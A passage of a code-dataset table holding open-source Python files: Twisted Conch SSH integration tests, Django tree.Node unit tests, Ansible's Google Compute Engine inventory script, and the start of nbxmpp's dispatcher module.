repo_name stringlengths 6 100 | path stringlengths 4 294 | copies stringlengths 1 5 | size stringlengths 4 6 | content stringlengths 606 896k | license stringclasses 15
values |
|---|---|---|---|---|---|
Architektor/PySnip | venv/lib/python2.7/site-packages/twisted/conch/test/test_conch.py | 2 | 20891 | # -*- test-case-name: twisted.conch.test.test_conch -*-
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
import os, sys, socket
from itertools import count
from zope.interface import implementer
from twisted.cred import portal
from twisted.internet import reactor, defer, protocol
from twisted.internet.error import ProcessExitedAlready
from twisted.internet.task import LoopingCall
from twisted.internet.utils import getProcessValue
from twisted.python import log, runtime
from twisted.trial import unittest
from twisted.conch.error import ConchError
from twisted.conch.avatar import ConchUser
from twisted.conch.ssh.session import ISession, SSHSession, wrapProtocol
try:
from twisted.conch.scripts.conch import SSHSession as StdioInteractingSession
except ImportError, e:
StdioInteractingSession = None
_reason = str(e)
del e
from twisted.conch.test.test_ssh import ConchTestRealm
from twisted.python.procutils import which
from twisted.conch.test.keydata import publicRSA_openssh, privateRSA_openssh
from twisted.conch.test.keydata import publicDSA_openssh, privateDSA_openssh
try:
from twisted.conch.test.test_ssh import ConchTestServerFactory, \
conchTestPublicKeyChecker
except ImportError:
pass
try:
import cryptography
except ImportError:
cryptography = None
try:
import pyasn1
except ImportError:
pyasn1 = None
class FakeStdio(object):
    """
    A test double standing in for the stdio object used by
    L{twisted.conch.scripts.conch.SSHSession.eofReceived} and
    L{twisted.conch.scripts.cftp.SSHSession.eofReceived}.

    @ivar writeConnLost: Whether L{loseWriteConnection} has been invoked.
    """
    # False until loseWriteConnection() is called.
    writeConnLost = False

    def loseWriteConnection(self):
        """
        Remember that the write half of the connection was asked to close.
        """
        self.writeConnLost = True
class StdioInteractingSessionTests(unittest.TestCase):
    """
    Tests for L{twisted.conch.scripts.conch.SSHSession}.
    """
    if StdioInteractingSession is None:
        skip = _reason

    def test_eofReceived(self):
        """
        L{twisted.conch.scripts.conch.SSHSession.eofReceived} loses the
        write half of its stdio connection.
        """
        fakeStdio = FakeStdio()
        session = StdioInteractingSession()
        session.stdio = fakeStdio
        session.eofReceived()
        self.assertTrue(fakeStdio.writeConnLost)
class Echo(protocol.Protocol):
    """
    Echo protocol: mirrors every received byte back to the peer and drops
    the connection once a newline has been echoed.
    """
    def connectionMade(self):
        log.msg('ECHO CONNECTION MADE')
    def connectionLost(self, reason):
        log.msg('ECHO CONNECTION DONE')
    def dataReceived(self, data):
        self.transport.write(data)
        if '\n' in data:
            # A full line has been echoed; hang up to signal completion.
            self.transport.loseConnection()
class EchoFactory(protocol.Factory):
    """Factory producing L{Echo} protocol instances."""
    protocol = Echo
class ConchTestOpenSSHProcess(protocol.ProcessProtocol):
    """
    Process protocol which collects stdout from an OpenSSH client child
    process and fires a Deferred when the process ends.

    @ivar deferred: Set by whatever uses this object.  Retrieved through
        L{_getDeferred}, which clears it so the Deferred can never be fired
        twice.  Fires when the process terminates.
    """
    deferred = None
    buf = ''

    def _getDeferred(self):
        """
        Return the pending Deferred and forget it, guaranteeing that it is
        only ever fired once.
        """
        pending = self.deferred
        self.deferred = None
        return pending

    def outReceived(self, data):
        """
        Accumulate the child's stdout.
        """
        self.buf = self.buf + data

    def processEnded(self, reason):
        """
        Fire the Deferred with the newline-normalized output on success, or
        errback with a L{ConchError} naming the non-zero exit code.

        @param reason: a Failure giving the reason for the process' end.
        """
        exitCode = reason.value.exitCode
        if exitCode == 0:
            self._getDeferred().callback(self.buf.replace('\r\n', '\n'))
        else:
            self._getDeferred().errback(
                ConchError("exit code was not 0: %s" % exitCode))
class ConchTestForwardingProcess(protocol.ProcessProtocol):
    """
    Manages a third-party process which launches a server.
    Uses L{ConchTestForwardingPort} to connect to the third-party server.
    Once L{ConchTestForwardingPort} has disconnected, kill the process and fire
    a Deferred with the data received by the L{ConchTestForwardingPort}.
    @ivar deferred: Set by whatever uses this object. Accessed using
        L{_getDeferred}, which destroys the value so the Deferred is not
        fired twice. Fires when the process is terminated.
    """
    deferred = None
    def __init__(self, port, data):
        """
        @type port: C{int}
        @param port: The port on which the third-party server is listening.
            (it is assumed that the server is running on localhost).
        @type data: C{str}
        @param data: This is sent to the third-party server. Must end with
            '\\n' in order to trigger a disconnect.
        """
        self.port = port
        # Set by forwardingPortDisconnected() to whatever the forwarded
        # connection received; None until then.
        self.buffer = None
        self.data = data
    def _getDeferred(self):
        # Swap the Deferred out for None so it can only ever fire once.
        d, self.deferred = self.deferred, None
        return d
    def connectionMade(self):
        self._connect()
    def _connect(self):
        """
        Connect to the server, which is often a third-party process.
        Tries to reconnect if it fails because we have no way of determining
        exactly when the port becomes available for listening -- we can only
        know when the process starts.
        """
        cc = protocol.ClientCreator(reactor, ConchTestForwardingPort, self,
                                    self.data)
        d = cc.connectTCP('127.0.0.1', self.port)
        d.addErrback(self._ebConnect)
        return d
    def _ebConnect(self, f):
        # The forwarded port is not listening yet; retry shortly.
        reactor.callLater(.1, self._connect)
    def forwardingPortDisconnected(self, buffer):
        """
        The network connection has died; save the buffer of output
        from the network and attempt to quit the process gracefully,
        and then (after the reactor has spun) send it a KILL signal.
        """
        self.buffer = buffer
        # '\x03' is ^C: ask the ssh client process to exit politely first.
        self.transport.write('\x03')
        self.transport.loseConnection()
        reactor.callLater(0, self._reallyDie)
    def _reallyDie(self):
        try:
            self.transport.signalProcess('KILL')
        except ProcessExitedAlready:
            # The graceful shutdown already worked; nothing left to kill.
            pass
    def processEnded(self, reason):
        """
        Fire the Deferred at self.deferred with the data collected
        from the L{ConchTestForwardingPort} connection, if any.
        """
        self._getDeferred().callback(self.buffer)
class ConchTestForwardingPort(protocol.Protocol):
    """
    Client protocol which connects to the server behind a forwarded port
    (managed by L{ConchTestForwardingProcess}), sends its payload, and hands
    everything it received back to that process once the connection closes.
    """
    def __init__(self, protocol, data):
        """
        @type protocol: L{ConchTestForwardingProcess}
        @param protocol: The L{ProcessProtocol} which made this connection.
        @type data: str
        @param data: The data to be sent to the third-party server.
        """
        self.protocol = protocol
        self.data = data

    def connectionMade(self):
        """
        Begin with an empty receive buffer and push the payload out.
        """
        self.buffer = ''
        self.transport.write(self.data)

    def dataReceived(self, data):
        """
        Collect whatever the server sends back.
        """
        self.buffer = self.buffer + data

    def connectionLost(self, reason):
        """
        Report everything collected to the managing process protocol.
        """
        self.protocol.forwardingPortDisconnected(self.buffer)
def _makeArgs(args, mod="conch"):
start = [sys.executable, '-c'
"""
### Twisted Preamble
import sys, os
path = os.path.abspath(sys.argv[0])
while os.path.dirname(path) != path:
if os.path.basename(path).startswith('Twisted'):
sys.path.insert(0, path)
break
path = os.path.dirname(path)
from twisted.conch.scripts.%s import run
run()""" % mod]
return start + list(args)
class ConchServerSetupMixin:
    """
    Mixin which starts a listening Conch SSH server plus IPv4 and IPv6 echo
    servers for integration tests, after writing the key and known-hosts
    fixture files that the client processes expect in the working directory.
    """
    if not cryptography:
        skip = "can't run without cryptography"
    if not pyasn1:
        skip = "Cannot run without PyASN1"
    realmFactory = staticmethod(lambda: ConchTestRealm('testuser'))

    def _createFiles(self):
        """
        (Re)create the RSA/DSA key files and the known-hosts file used by
        the tests, with permissions restrictive enough for OpenSSH.
        """
        for f in ['rsa_test', 'rsa_test.pub', 'dsa_test', 'dsa_test.pub',
                  'kh_test']:
            if os.path.exists(f):
                os.remove(f)
        # Use context managers so each file is flushed and closed before a
        # child ssh/conch process tries to read it (the previous
        # open(...).write(...) form leaked open file objects).
        with open('rsa_test', 'w') as f:
            f.write(privateRSA_openssh)
        with open('rsa_test.pub', 'w') as f:
            f.write(publicRSA_openssh)
        with open('dsa_test.pub', 'w') as f:
            f.write(publicDSA_openssh)
        with open('dsa_test', 'w') as f:
            f.write(privateDSA_openssh)
        # 33152 == 0o100600: private keys must be owner read/write only or
        # OpenSSH refuses to use them.
        os.chmod('dsa_test', 33152)
        os.chmod('rsa_test', 33152)
        with open('kh_test', 'w') as f:
            f.write('127.0.0.1 ' + publicRSA_openssh)

    def _getFreePort(self):
        """
        Return a TCP port number which was free a moment ago: bind to port
        0, read back the kernel-assigned port, then close the socket.
        """
        s = socket.socket()
        s.bind(('', 0))
        port = s.getsockname()[1]
        s.close()
        return port

    def _makeConchFactory(self):
        """
        Make a L{ConchTestServerFactory}, which allows us to start a
        L{ConchTestServer} -- i.e. an actually listening conch.
        """
        realm = self.realmFactory()
        p = portal.Portal(realm)
        p.registerChecker(conchTestPublicKeyChecker())
        factory = ConchTestServerFactory()
        factory.portal = p
        return factory

    def setUp(self):
        """
        Write the fixture files and start the conch server plus the IPv4 and
        IPv6 echo servers on ephemeral ports.
        """
        self._createFiles()
        self.conchFactory = self._makeConchFactory()
        self.conchFactory.expectedLoseConnection = 1
        self.conchServer = reactor.listenTCP(0, self.conchFactory,
                                             interface="127.0.0.1")
        self.echoServer = reactor.listenTCP(0, EchoFactory())
        self.echoPort = self.echoServer.getHost().port
        self.echoServerV6 = reactor.listenTCP(0, EchoFactory(), interface="::1")
        self.echoPortV6 = self.echoServerV6.getHost().port

    def tearDown(self):
        """
        Mark the server protocol as done (if a client ever connected) and
        stop all three listening ports.
        """
        try:
            self.conchFactory.proto.done = 1
        except AttributeError:
            # No client connected, so there is no protocol to tidy up.
            pass
        else:
            self.conchFactory.proto.transport.loseConnection()
        return defer.gatherResults([
            defer.maybeDeferred(self.conchServer.stopListening),
            defer.maybeDeferred(self.echoServer.stopListening),
            defer.maybeDeferred(self.echoServerV6.stopListening)])
class ForwardingMixin(ConchServerSetupMixin):
    """
    Template class for tests of the Conch server's ability to forward arbitrary
    protocols over SSH.
    These tests are integration tests, not unit tests. They launch a Conch
    server, a custom TCP server (just an L{EchoProtocol}) and then call
    L{execute}.
    L{execute} is implemented by subclasses of L{ForwardingMixin}. It should
    cause an SSH client to connect to the Conch server, asking it to forward
    data to the custom TCP server.
    """
    def test_exec(self):
        """
        Test that we can use whatever client to send the command "echo goodbye"
        to the Conch server. Make sure we receive "goodbye" back from the
        server.
        """
        d = self.execute('echo goodbye', ConchTestOpenSSHProcess())
        return d.addCallback(self.assertEqual, 'goodbye\n')
    def test_localToRemoteForwarding(self):
        """
        Test that we can use whatever client to forward a local port to a
        specified port on the server.
        """
        localPort = self._getFreePort()
        process = ConchTestForwardingProcess(localPort, 'test\n')
        # -N: no remote command; -L: forward localPort to the echo server.
        d = self.execute('', process,
                         sshArgs='-N -L%i:127.0.0.1:%i'
                         % (localPort, self.echoPort))
        d.addCallback(self.assertEqual, 'test\n')
        return d
    def test_remoteToLocalForwarding(self):
        """
        Test that we can use whatever client to forward a port from the server
        to a port locally.
        """
        localPort = self._getFreePort()
        process = ConchTestForwardingProcess(localPort, 'test\n')
        # -R: reverse forwarding, a server-side port back to the local echo.
        d = self.execute('', process,
                         sshArgs='-N -R %i:127.0.0.1:%i'
                         % (localPort, self.echoPort))
        d.addCallback(self.assertEqual, 'test\n')
        return d
# Conventionally there is a separate adapter object which provides ISession for
# the user, but making the user provide ISession directly works too. This isn't
# a full implementation of ISession though, just enough to make these tests
# pass.
@implementer(ISession)
class RekeyAvatar(ConchUser):
    """
    This avatar implements a shell which sends 60 numbered lines to whatever
    connects to it, then closes the session with a 0 exit status.
    60 lines is selected as being enough to send more than 2kB of traffic, the
    amount the client is configured to initiate a rekey after.
    """
    def __init__(self):
        ConchUser.__init__(self)
        self.channelLookup['session'] = SSHSession
    def openShell(self, transport):
        """
        Write 60 lines of data to the transport, then exit.
        """
        proto = protocol.Protocol()
        proto.makeConnection(transport)
        transport.makeConnection(wrapProtocol(proto))
        # Send enough bytes to the connection so that a rekey is triggered in
        # the client.
        def write(counter):
            i = counter()
            if i == 60:
                call.stop()
                # 'exit-status' payload is a big-endian uint32; all zeros
                # means success.
                transport.session.conn.sendRequest(
                    transport.session, 'exit-status', '\x00\x00\x00\x00')
                transport.loseConnection()
            else:
                transport.write("line #%02d\n" % (i,))
        # The timing for this loop is an educated guess (and/or the result of
        # experimentation) to exercise the case where a packet is generated
        # mid-rekey. Since the other side of the connection is (so far) the
        # OpenSSH command line client, there's no easy way to determine when the
        # rekey has been initiated. If there were, then generating a packet
        # immediately at that time would be a better way to test the
        # functionality being tested here.
        # NOTE(review): count().next is Python 2 only; a Python 3 port would
        # need functools.partial(next, count()).
        call = LoopingCall(write, count().next)
        call.start(0.01)
    def closed(self):
        """
        Ignore the close of the session.
        """
class RekeyRealm:
    """
    This realm gives out new L{RekeyAvatar} instances for any avatar request.
    """
    def requestAvatar(self, avatarID, mind, *interfaces):
        # Returns (interface, avatar, logout); the logout callable is a no-op.
        return interfaces[0], RekeyAvatar(), lambda: None
class RekeyTestsMixin(ConchServerSetupMixin):
    """
    TestCase mixin which defines tests exercising L{SSHTransportBase}'s handling
    of rekeying messages.
    """
    realmFactory = RekeyRealm
    def test_clientRekey(self):
        """
        After a client-initiated rekey is completed, application data continues
        to be passed over the SSH connection.
        """
        process = ConchTestOpenSSHProcess()
        # RekeyLimit=2K makes the client rekey mid-stream; the RekeyAvatar
        # shell sends more than 2kB of numbered lines.
        d = self.execute("", process, '-o RekeyLimit=2K')
        def finished(result):
            self.assertEqual(
                result,
                '\n'.join(['line #%02d' % (i,) for i in range(60)]) + '\n')
        d.addCallback(finished)
        return d
class OpenSSHClientMixin:
    """
    Mixin providing an C{execute} implementation which drives the OpenSSH
    command line client against the test's Conch server.
    """
    if not which('ssh'):
        skip = "no ssh command-line client available"
    def execute(self, remoteCommand, process, sshArgs=''):
        """
        Connects to the SSH server started in L{ConchServerSetupMixin.setUp} by
        running the 'ssh' command line tool.
        @type remoteCommand: str
        @param remoteCommand: The command (with arguments) to run on the
            remote end.
        @type process: L{ConchTestOpenSSHProcess}
        @type sshArgs: str
        @param sshArgs: Arguments to pass to the 'ssh' process.
        @return: L{defer.Deferred}
        """
        # PubkeyAcceptedKeyTypes does not exist prior to OpenSSH 7.0 so we
        # first need to check if we can set it. If we can, -V will just print
        # the version without doing anything else; if we can't, we will get a
        # configuration error.
        d = getProcessValue(
            'ssh', ('-o', 'PubkeyAcceptedKeyTypes=ssh-dss', '-V'))
        def hasPAKT(status):
            # status 0 means the probe accepted the option.
            if status == 0:
                opts = '-oPubkeyAcceptedKeyTypes=ssh-dss '
            else:
                opts = ''
            process.deferred = defer.Deferred()
            # Pass -F /dev/null to avoid the user's configuration file from
            # being loaded, as it may contain settings that cause our tests to
            # fail or hang.
            cmdline = ('ssh -2 -l testuser -p %i '
                       '-F /dev/null '
                       '-oUserKnownHostsFile=kh_test '
                       '-oPasswordAuthentication=no '
                       # Always use the RSA key, since that's the one in kh_test.
                       '-oHostKeyAlgorithms=ssh-rsa '
                       '-a '
                       '-i dsa_test ') + opts + sshArgs + \
                       ' 127.0.0.1 ' + remoteCommand
            port = self.conchServer.getHost().port
            cmds = (cmdline % port).split()
            reactor.spawnProcess(process, "ssh", cmds)
            return process.deferred
        return d.addCallback(hasPAKT)
class OpenSSHKeyExchangeTestCase(ConchServerSetupMixin, OpenSSHClientMixin,
                                 unittest.TestCase):
    """
    Verify L{SSHTransportBase}'s key exchange algorithm compatibility with
    the OpenSSH command line client.
    """
    def assertExecuteWithKexAlgorithm(self, keyExchangeAlgo):
        """
        Run C{echo hello} over a connection restricted to the given key
        exchange algorithm and check that the expected output arrives.

        @type keyExchangeAlgo: C{str}
        @param keyExchangeAlgo: The key exchange algorithm to use
        @return: L{defer.Deferred}
        """
        kexArgument = '-oKexAlgorithms=' + keyExchangeAlgo
        deferred = self.execute('echo hello', ConchTestOpenSSHProcess(),
                                kexArgument)
        return deferred.addCallback(self.assertEqual, 'hello\n')

    def test_DH_GROUP1(self):
        """
        The diffie-hellman-group1-sha1 key exchange algorithm is compatible
        with OpenSSH.
        """
        return self.assertExecuteWithKexAlgorithm('diffie-hellman-group1-sha1')

    def test_DH_GROUP14(self):
        """
        The diffie-hellman-group14-sha1 key exchange algorithm is compatible
        with OpenSSH.
        """
        return self.assertExecuteWithKexAlgorithm(
            'diffie-hellman-group14-sha1')

    def test_DH_GROUP_EXCHANGE_SHA1(self):
        """
        The diffie-hellman-group-exchange-sha1 key exchange algorithm is
        compatible with OpenSSH.
        """
        return self.assertExecuteWithKexAlgorithm(
            'diffie-hellman-group-exchange-sha1')

    def test_DH_GROUP_EXCHANGE_SHA256(self):
        """
        The diffie-hellman-group-exchange-sha256 key exchange algorithm is
        compatible with OpenSSH.
        """
        return self.assertExecuteWithKexAlgorithm(
            'diffie-hellman-group-exchange-sha256')
class OpenSSHClientForwardingTests(ForwardingMixin, OpenSSHClientMixin,
                                   unittest.TestCase):
    """
    Connection forwarding tests run against the OpenSSH command line client.
    """
    def test_localToRemoteForwardingV6(self):
        """
        Forwarding of arbitrary IPv6 TCP connections via SSH.
        """
        localPort = self._getFreePort()
        process = ConchTestForwardingProcess(localPort, 'test\n')
        # [::1] is the bracketed IPv6 loopback form required by ssh -L.
        d = self.execute('', process,
                         sshArgs='-N -L%i:[::1]:%i'
                         % (localPort, self.echoPortV6))
        d.addCallback(self.assertEqual, 'test\n')
        return d
class OpenSSHClientRekeyTests(RekeyTestsMixin, OpenSSHClientMixin,
                              unittest.TestCase):
    """
    Rekeying tests run against the OpenSSH command line client.
    """
class CmdLineClientTests(ForwardingMixin, unittest.TestCase):
    """
    Connection forwarding tests run against the Conch command line client.
    """
    if runtime.platformType == 'win32':
        skip = "can't run cmdline client on win32"
    def execute(self, remoteCommand, process, sshArgs=''):
        """
        As for L{OpenSSHClientTestCase.execute}, except it runs the 'conch'
        command line tool, not 'ssh'.
        """
        process.deferred = defer.Deferred()
        port = self.conchServer.getHost().port
        cmd = ('-p %i -l testuser '
               '--known-hosts kh_test '
               '--user-authentications publickey '
               '--host-key-algorithms ssh-rsa '
               '-a '
               '-i dsa_test '
               '-v ') % port + sshArgs + \
               ' 127.0.0.1 ' + remoteCommand
        cmds = _makeArgs(cmd.split())
        log.msg(str(cmds))
        # Run the conch script in a child interpreter, propagating sys.path
        # so the child can import the same Twisted.
        env = os.environ.copy()
        env['PYTHONPATH'] = os.pathsep.join(sys.path)
        reactor.spawnProcess(process, sys.executable, cmds, env=env)
        return process.deferred
| gpl-3.0 |
hottwaj/django | tests/utils_tests/test_tree.py | 429 | 1951 | import copy
import unittest
from django.utils.tree import Node
class NodeTests(unittest.TestCase):
    """
    Unit tests for the basic behaviour of django.utils.tree.Node.
    """
    def setUp(self):
        self.node1_children = [('a', 1), ('b', 2)]
        self.node1 = Node(self.node1_children)
        self.node2 = Node()

    def test_str(self):
        expected = "(DEFAULT: ('a', 1), ('b', 2))"
        self.assertEqual(str(self.node1), expected)
        self.assertEqual(str(self.node2), "(DEFAULT: )")

    def test_repr(self):
        self.assertEqual(
            repr(self.node1), "<Node: (DEFAULT: ('a', 1), ('b', 2))>")
        self.assertEqual(repr(self.node2), "<Node: (DEFAULT: )>")

    def test_len(self):
        self.assertEqual(len(self.node1), 2)
        self.assertEqual(len(self.node2), 0)

    def test_bool(self):
        # A node with children is truthy; an empty node is falsy.
        self.assertTrue(self.node1)
        self.assertFalse(self.node2)

    def test_contains(self):
        self.assertIn(('a', 1), self.node1)
        self.assertNotIn(('a', 1), self.node2)

    def test_add(self):
        # Start from the same children as node1, then append one item.
        node3 = Node(self.node1_children)
        new_child = ('c', 3)
        # add() hands back the data it just added.
        self.assertEqual(node3.add(new_child, Node.default), new_child)
        # Exactly one element more than node1.
        self.assertEqual(len(self.node1) + 1, len(node3))
        self.assertEqual(str(node3), "(DEFAULT: ('a', 1), ('b', 2), ('c', 3))")

    def test_negate(self):
        # negated starts out False and toggles on every negate() call.
        self.assertFalse(self.node1.negated)
        self.node1.negate()
        self.assertTrue(self.node1.negated)
        self.node1.negate()
        self.assertFalse(self.node1.negated)

    def test_deepcopy(self):
        shallow = copy.copy(self.node1)
        deep = copy.deepcopy(self.node1)
        # A shallow copy shares the children list; a deep copy does not.
        self.assertIs(self.node1.children, shallow.children)
        self.assertIsNot(self.node1.children, deep.children)
| bsd-3-clause |
saada/ansible | plugins/inventory/gce.py | 13 | 10489 | #!/usr/bin/env python
# Copyright 2013 Google Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
'''
GCE external inventory script
=================================
Generates inventory that Ansible can understand by making API requests
Google Compute Engine via the libcloud library. Full install/configuration
instructions for the gce* modules can be found in the comments of
ansible/test/gce_tests.py.
When run against a specific host, this script returns the following variables
based on the data obtained from the libcloud Node object:
- gce_uuid
- gce_id
- gce_image
- gce_machine_type
- gce_private_ip
- gce_public_ip
- gce_name
- gce_description
- gce_status
- gce_zone
- gce_tags
- gce_metadata
- gce_network
When run in --list mode, instances are grouped by the following categories:
- zone:
zone group name examples are us-central1-b, europe-west1-a, etc.
- instance tags:
An entry is created for each tag. For example, if you have two instances
with a common tag called 'foo', they will both be grouped together under
the 'tag_foo' name.
- network name:
the name of the network is appended to 'network_' (e.g. the 'default'
network will result in a group named 'network_default')
- machine type
types follow a pattern like n1-standard-4, g1-small, etc.
- running status:
group name prefixed with 'status_' (e.g. status_running, status_stopped,..)
- image:
when using an ephemeral/scratch disk, this will be set to the image name
used when creating the instance (e.g. debian-7-wheezy-v20130816). when
your instance was created with a root persistent disk it will be set to
'persistent_disk' since there is no current way to determine the image.
Examples:
Execute uname on all instances in the us-central1-a zone
$ ansible -i gce.py us-central1-a -m shell -a "/bin/uname -a"
Use the GCE inventory script to print out instance specific information
$ plugins/inventory/gce.py --host my_instance
Author: Eric Johnson <erjohnso@google.com>
Version: 0.0.1
'''
__requires__ = ['pycrypto>=2.6']
try:
import pkg_resources
except ImportError:
# Use pkg_resources to find the correct versions of libraries and set
# sys.path appropriately when there are multiversion installs. We don't
# fail here as there is code that better expresses the errors where the
# library is used.
pass
USER_AGENT_PRODUCT="Ansible-gce_inventory_plugin"
USER_AGENT_VERSION="v1"
import sys
import os
import argparse
import ConfigParser
try:
import json
except ImportError:
import simplejson as json
try:
from libcloud.compute.types import Provider
from libcloud.compute.providers import get_driver
_ = Provider.GCE
except:
print("GCE inventory script requires libcloud >= 0.13")
sys.exit(1)
class GceInventory(object):
    """
    Ansible dynamic inventory source backed by Google Compute Engine via the
    libcloud GCE driver.  Instantiating this class does all the work: it
    parses the command line, queries GCE and prints JSON to stdout.
    """
    def __init__(self):
        # Read settings and parse CLI arguments
        self.parse_cli_args()
        self.driver = self.get_gce_driver()
        # Just display data for specific host
        if self.args.host:
            print self.json_format_dict(self.node_to_dict(
                self.get_instance(self.args.host)),
                pretty=self.args.pretty)
            sys.exit(0)
        # Otherwise, assume user wants all instances grouped
        print(self.json_format_dict(self.group_instances(),
            pretty=self.args.pretty))
        sys.exit(0)
    def get_gce_driver(self):
        """Determine the GCE authorization settings and return a
        libcloud driver.
        """
        gce_ini_default_path = os.path.join(
            os.path.dirname(os.path.realpath(__file__)), "gce.ini")
        gce_ini_path = os.environ.get('GCE_INI_PATH', gce_ini_default_path)
        # Create a ConfigParser.
        # This provides empty defaults to each key, so that environment
        # variable configuration (as opposed to INI configuration) is able
        # to work.
        config = ConfigParser.SafeConfigParser(defaults={
            'gce_service_account_email_address': '',
            'gce_service_account_pem_file_path': '',
            'gce_project_id': '',
            'libcloud_secrets': '',
        })
        if 'gce' not in config.sections():
            config.add_section('gce')
        config.read(gce_ini_path)
        # Attempt to get GCE params from a configuration file, if one
        # exists.
        secrets_path = config.get('gce', 'libcloud_secrets')
        secrets_found = False
        try:
            # First preference: a secrets.py already importable on sys.path.
            import secrets
            args = list(getattr(secrets, 'GCE_PARAMS', []))
            kwargs = getattr(secrets, 'GCE_KEYWORD_PARAMS', {})
            secrets_found = True
        except:
            pass
        if not secrets_found and secrets_path:
            if not secrets_path.endswith('secrets.py'):
                err = "Must specify libcloud secrets file as "
                err += "/absolute/path/to/secrets.py"
                print(err)
                sys.exit(1)
            sys.path.append(os.path.dirname(secrets_path))
            try:
                # Second preference: secrets.py next to the configured path.
                import secrets
                args = list(getattr(secrets, 'GCE_PARAMS', []))
                kwargs = getattr(secrets, 'GCE_KEYWORD_PARAMS', {})
                secrets_found = True
            except:
                pass
        if not secrets_found:
            # Fall back to credentials configured in gce.ini itself.
            args = [
                config.get('gce','gce_service_account_email_address'),
                config.get('gce','gce_service_account_pem_file_path')
            ]
            kwargs = {'project': config.get('gce', 'gce_project_id')}
        # If the appropriate environment variables are set, they override
        # other configuration; process those into our args and kwargs.
        args[0] = os.environ.get('GCE_EMAIL', args[0])
        args[1] = os.environ.get('GCE_PEM_FILE_PATH', args[1])
        kwargs['project'] = os.environ.get('GCE_PROJECT', kwargs['project'])
        # Retrieve and return the GCE driver.
        gce = get_driver(Provider.GCE)(*args, **kwargs)
        gce.connection.user_agent_append(
            '%s/%s' % (USER_AGENT_PRODUCT, USER_AGENT_VERSION),
        )
        return gce
    def parse_cli_args(self):
        ''' Command line argument processing '''
        parser = argparse.ArgumentParser(
            description='Produce an Ansible Inventory file based on GCE')
        parser.add_argument('--list', action='store_true', default=True,
            help='List instances (default: True)')
        parser.add_argument('--host', action='store',
            help='Get all information about an instance')
        parser.add_argument('--pretty', action='store_true', default=False,
            help='Pretty format (default: False)')
        self.args = parser.parse_args()
    def node_to_dict(self, inst):
        # Flatten a libcloud Node into the gce_* hostvars dictionary.
        md = {}
        if inst is None:
            return {}
        if inst.extra['metadata'].has_key('items'):
            for entry in inst.extra['metadata']['items']:
                md[entry['key']] = entry['value']
        net = inst.extra['networkInterfaces'][0]['network'].split('/')[-1]
        return {
            'gce_uuid': inst.uuid,
            'gce_id': inst.id,
            'gce_image': inst.image,
            'gce_machine_type': inst.size,
            'gce_private_ip': inst.private_ips[0],
            'gce_public_ip': inst.public_ips[0] if len(inst.public_ips) >= 1 else None,
            'gce_name': inst.name,
            'gce_description': inst.extra['description'],
            'gce_status': inst.extra['status'],
            'gce_zone': inst.extra['zone'].name,
            'gce_tags': inst.extra['tags'],
            'gce_metadata': md,
            'gce_network': net,
            # Hosts don't have a public name, so we add an IP
            'ansible_ssh_host': inst.public_ips[0] if len(inst.public_ips) >= 1 else inst.private_ips[0]
        }
    def get_instance(self, instance_name):
        '''Gets details about a specific instance '''
        try:
            return self.driver.ex_get_node(instance_name)
        except Exception, e:
            # Unknown or unreachable instances are reported as empty.
            return None
    def group_instances(self):
        '''Group all instances'''
        groups = {}
        meta = {}
        meta["hostvars"] = {}
        for node in self.driver.list_nodes():
            name = node.name
            meta["hostvars"][name] = self.node_to_dict(node)
            # Group by zone name (e.g. us-central1-b).
            zone = node.extra['zone'].name
            if groups.has_key(zone): groups[zone].append(name)
            else: groups[zone] = [name]
            # One 'tag_<name>' group per instance tag.
            tags = node.extra['tags']
            for t in tags:
                tag = 'tag_%s' % t
                if groups.has_key(tag): groups[tag].append(name)
                else: groups[tag] = [name]
            # Group by network, prefixed with 'network_'.
            net = node.extra['networkInterfaces'][0]['network'].split('/')[-1]
            net = 'network_%s' % net
            if groups.has_key(net): groups[net].append(name)
            else: groups[net] = [name]
            # Group by machine type (e.g. n1-standard-4).
            machine_type = node.size
            if groups.has_key(machine_type): groups[machine_type].append(name)
            else: groups[machine_type] = [name]
            # Persistent-disk instances report no image name, so use the
            # literal 'persistent_disk' as the group instead.
            image = node.image and node.image or 'persistent_disk'
            if groups.has_key(image): groups[image].append(name)
            else: groups[image] = [name]
            # Group by lower-cased status, prefixed with 'status_'.
            status = node.extra['status']
            stat = 'status_%s' % status.lower()
            if groups.has_key(stat): groups[stat].append(name)
            else: groups[stat] = [name]
        groups["_meta"] = meta
        return groups
    def json_format_dict(self, data, pretty=False):
        ''' Converts a dict to a JSON object and dumps it as a formatted
        string '''
        if pretty:
            return json.dumps(data, sort_keys=True, indent=2)
        else:
            return json.dumps(data)
# Run the script: constructing GceInventory parses the arguments, queries
# GCE, prints the JSON inventory to stdout and exits.
GceInventory()
| gpl-3.0 |
gajim/python-nbxmpp | nbxmpp/dispatcher.py | 1 | 19414 | # Copyright (C) 2019 Philipp Hörist <philipp AT hoerist.com>
#
# This file is part of nbxmpp.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 3
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; If not, see <http://www.gnu.org/licenses/>.
import logging
import re
import time
from xml.parsers.expat import ExpatError
from gi.repository import GLib
from nbxmpp.simplexml import NodeBuilder
from nbxmpp.simplexml import Node
from nbxmpp.namespaces import Namespace
from nbxmpp.protocol import NodeProcessed
from nbxmpp.protocol import InvalidFrom
from nbxmpp.protocol import InvalidJid
from nbxmpp.protocol import InvalidStanza
from nbxmpp.protocol import Iq
from nbxmpp.protocol import Presence
from nbxmpp.protocol import Message
from nbxmpp.protocol import Protocol
from nbxmpp.protocol import Error
from nbxmpp.protocol import StreamErrorNode
from nbxmpp.protocol import ERR_FEATURE_NOT_IMPLEMENTED
from nbxmpp.modules.eme import EME
from nbxmpp.modules.http_auth import HTTPAuth
from nbxmpp.modules.presence import BasePresence
from nbxmpp.modules.message import BaseMessage
from nbxmpp.modules.iq import BaseIq
from nbxmpp.modules.nickname import Nickname
